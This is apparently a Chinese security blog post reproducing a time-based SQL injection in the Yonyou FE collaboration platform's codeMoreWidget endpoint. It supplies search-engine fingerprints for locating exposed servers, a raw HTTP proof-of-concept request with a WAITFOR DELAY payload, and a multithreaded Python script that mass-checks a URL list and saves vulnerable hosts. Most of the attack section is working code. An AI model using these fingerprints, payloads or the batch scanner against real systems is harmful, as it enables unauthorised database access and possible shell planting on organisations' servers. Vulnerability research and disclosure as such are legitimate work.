当前位置: 首页 > news >正文

【致远互联FE协作办公平台 codeMoreWidget SQL注入】复现

news 来源:原创 2024/9/18 17:41:51

目录

一、漏洞简介

二、资产测绘

三、POC信息

四、脚本批量验证

一、漏洞简介

    致远互联FE协作办公平台(Yonyou U8 FE)是由北京致远互联科技股份有限公司开发的一款企业级协同办公平台。它主要提供以下功能和特点:协同办公:支持团队成员之间的协作和信息共享,包括任务管理、日程安排、文档协作等功能。信息化管理:提供企业级信息管理功能,包括客户关系管理(CRM)、人力资源管理(HRM)、财务管理等模块。流程管理:支持工作流程的自定义设计和管理,帮助企业优化内部运营流程,提升效率和管理水平。漏洞位于/common/codeMoreWidget.js%70接口未对POST传递的code参数做sql注入防范导致攻击者可以获取到数据库信息,甚至在高权限的情况下写入shell。

二、资产测绘

Fofa:
body="li_plugins_download"360quake:
body:"li_plugins_download"

三、POC信息

POST /common/codeMoreWidget.js%70 HTTP/1.1 
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36code=1';WAITFOR DELAY '0:0:3'--

sqlmap验证:

四、脚本批量验证

url.txt中加入目标网站

import requests
from requests.exceptions import RequestException
import urllib3
import time
import threading
from queue import Queueurllib3.disable_warnings()post_data = {"code": "1';WAITFOR DELAY '0:0:5'--"
}header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ""(KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36","Accept": "*/*","Accept-Language": "zh-CN,zh;q=0.9","Accept-Encoding": "gzip, deflate","Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
}result_list = []def poc(url):url = url.strip()  url = url + "/common/codeMoreWidget.js%70"try:start_time = time.time()response = requests.post(url, data=post_data, verify=False, headers=header, timeout=15)end_time = time.time()pass_time = end_time - start_time# pass_time = int(pass_time)return pass_timeexcept RequestException as e:# print(f"请求错误:{e}")return Nonedef worker():while True:url = task_queue.get()if url is None:breakreturn_time = poc(url)if return_time is not None and return_time >= 5:print(f"{url.strip()}:存在漏洞")result_list.append(url.strip())task_queue.task_done()def panduan():with open("url.txt", "r") as check_file:for url in check_file:task_queue.put(url)num_threads = 20  # # 线程池threads = []for _ in range(num_threads):t = threading.Thread(target=worker)t.start()threads.append(t)# 等待task_queue.join()for _ in range(num_threads):task_queue.put(None)for t in threads:t.join()with open("vulnerable.txt", "w") as result_file:for url in result_list:result_file.write(url + "\n")if __name__ == '__main__':task_queue = Queue()panduan()print("扫描完成")

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 算法训练1
  • 2024-08-01 QML开发小技巧二
  • 华为OD应聘最全流程!!!
  • python初涉
  • memos content too long
  • 玩机进阶教程-----手机恢复出厂 误删除照片视频 误刷机后 几种数据恢复操作步骤解析【一】
  • 【通俗理解】马尔科夫毯:信息屏障与状态独立性的守护者
  • 基于地理面矢量的虚拟围栏
  • 深入 go interface 底层原理
  • 多模态模型BLIP2学习笔记
  • apache2和httpd web服务器
  • JavaScript 和 HTML5 Canvas实现图像绘制与处理
  • Java:多线程(进程线程、线程状态、创建线程、线程操作)
  • 【 问题 】 AT32 F413CB 设置SRAM大小为64KB 导致Flash后64KB代码执行变慢 解决办法
  • 搞懂数据结构与Java实现
  • 07.Android之多媒体问题
  • Android优雅地处理按钮重复点击
  • axios请求、和返回数据拦截,统一请求报错提示_012
  • Docker容器管理
  • IndexedDB
  • OpenStack安装流程(juno版)- 添加网络服务(neutron)- controller节点
  • redis学习笔记(三):列表、集合、有序集合
  • 阿里云前端周刊 - 第 26 期
  • 对象管理器(defineProperty)学习笔记
  • 蓝海存储开关机注意事项总结
  • 名企6年Java程序员的工作总结,写给在迷茫中的你!
  • 让你的分享飞起来——极光推出社会化分享组件
  • 入门级的git使用指北
  • 软件开发学习的5大技巧,你知道吗?
  • 使用 Docker 部署 Spring Boot项目
  • 体验javascript之美-第五课 匿名函数自执行和闭包是一回事儿吗?
  • 我与Jetbrains的这些年
  • 用quicker-worker.js轻松跑一个大数据遍历
  • ​html.parser --- 简单的 HTML 和 XHTML 解析器​
  • ​LeetCode解法汇总2696. 删除子串后的字符串最小长度
  • ​软考-高级-信息系统项目管理师教程 第四版【第19章-配置与变更管理-思维导图】​
  • (1) caustics\
  • (2022版)一套教程搞定k8s安装到实战 | RBAC
  • (52)只出现一次的数字III
  • (AngularJS)Angular 控制器之间通信初探
  • (web自动化测试+python)1
  • (二)延时任务篇——通过redis的key监听,实现延迟任务实战
  • (五)c52学习之旅-静态数码管
  • (新)网络工程师考点串讲与真题详解
  • (一)utf8mb4_general_ci 和 utf8mb4_unicode_ci 适用排序和比较规则场景
  • (转载)在C#用WM_COPYDATA消息来实现两个进程之间传递数据
  • .babyk勒索病毒解析:恶意更新如何威胁您的数据安全
  • .NET(C#、VB)APP开发——Smobiler平台控件介绍:Bluetooth组件
  • .NET序列化 serializable,反序列化
  • @Async 异步注解使用
  • @cacheable 是否缓存成功_让我们来学习学习SpringCache分布式缓存,为什么用?
  • [2016.7 day.5] T2
  • [51nod1610]路径计数
  • [AIGC] Java List接口详解
  • [AIGC] 深入浅出 Python中的`enumerate`函数